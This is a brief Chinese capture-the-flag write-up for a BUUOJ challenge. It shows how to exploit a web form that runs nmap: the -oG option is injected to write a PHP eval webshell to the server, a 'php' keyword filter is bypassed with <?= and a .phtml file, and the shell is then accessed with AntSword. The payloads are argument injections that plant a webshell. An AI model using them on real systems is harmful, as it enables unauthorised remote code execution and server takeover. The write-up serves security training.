题目地址:https://buuoj.cn/challenges
解题思路
第一步:进入题目,一个输入框,让我们输入nmap扫描的ip地址
第二步:获取flag
- 可以使用命令 -oG制作一句话木马,输入
' <?php @eval($_POST["hack"]);?> -oG hack.php '发现提示hacker,猜测不能使用php关键字 - 输入
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '发现语句执行成功 - 使用蚁剑连接地址
http://d27be917-23c4-443f-99f6-7ce2dbd198ff.node3.buuoj.cn/hack.phtml获取flag
